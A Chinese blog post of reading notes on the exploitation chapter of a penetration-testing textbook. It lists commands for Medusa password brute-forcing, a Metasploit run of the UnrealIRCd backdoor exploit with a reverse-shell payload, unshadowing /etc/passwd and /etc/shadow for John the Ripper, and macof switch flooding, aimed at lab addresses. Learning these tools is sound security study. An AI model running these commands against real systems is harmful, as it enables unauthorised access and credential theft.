渗透测试实践-漏洞利用

本文是我阅读《渗透测试实践指南·第四章·漏洞利用》所做的笔记。

零、开始

  • 漏洞利用是获得系统控制权限的过程
  • 以扫描成果组织、确定并指导漏洞利用

一、利用Medusa获得远程服务的访问权限

  • Medusa是一款在线密码破解工具,Kali中默认安装
  • Kali自带密码字典:/usr/share/wordlists/
  • 用侦查所得信息生成针对性用户名、密码字典
  • 电子邮箱前缀往往是用户名
  • 尝试另一款在线密码破解工具:Hydra
    medusa -h target_ip -u username -P path_to_password_dictionary -M authentication_service_to_attack
    

二、Metasploit:用Hugh Jackman的方式进行入侵

  • Hugh Jackman——《剑鱼行动》主角
  • 攻击荷载回答的问题是:“我已经控制了机器,接着要干嘛?”
  • Metasploit是手术刀不是大板斧,是狙击枪不是机关枪
  • 启动Metasploit:msfconsole
  • 升级Metasploit:msfupdate
  • 搜索漏洞对应攻击程序:search cve-2010-2075(ms、cve和bid等)
  • 使用某一攻击程序:use exploit/unix/irc/unreal_ircd_3281_backdoor
  • 显示可用攻击荷载:show payloads(会显示与已选攻击程序相匹配的所有攻击荷载)
  • 设置payload:set payload cmd/unix/reverse
  • 查看选项:show options
  • 设置选项:set RHOST 192.168.56.251
  • 核对选项:show options
  • 发起攻击:exploit

三、John the Ripper:密码破解之王

  • 测试硬件性能:john –test
  • unshadow /etc/passwd /etc/shadow > /tmp/hash.txt
  • hashcat差不多的东西

四、密码重置:破墙而入

  • chntpw

五、Wireshark:流量嗅探

  • 将网卡置为混杂模式
  • 交换机环境下嗅探前可先运行Macof
  • 用于中间人攻击的工具:Ettercap

六、Macof:巧妇能为无米之炊

  • Macof是Dsniff工具集中的一个工具
  • 失效开放(fail open):交换机匹配不到某报文目标MAC地址对应的端口时会将该报文发送到各个端口
  • 失效关闭(fail close):某些交换机采用失效关闭策略
  • 泛洪攻击:用大量伪造MAC地址填满交换机匹配表
    macof -i eth0 -s 192.168.18.130 -d 192.168.18.2
    

七、Armitage:入侵工具中的超级明星

  • 图形界面化的Metasploit
  • 发现主机:Hosts -> Nmap Scan -> Quick Scan(OS detect)
  • 进行入侵:Attacks -> Hail Mary
  • Hail Mary是机关枪式的攻击,会尝试所有可能的攻击方式

八、结束

  • Metasploit官方教程:Metasploit Unleashed
  • 渗透测试模拟环境:De-ICE
  • 不要轻易寻求别人的帮助、不要过早放弃、不要频繁依赖提示
  • 硬着头皮啃一下乍一看似乎不可能完成的难题,这一过程具有很大的价值,可以充分挖掘学习的潜力

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

4 − 3 =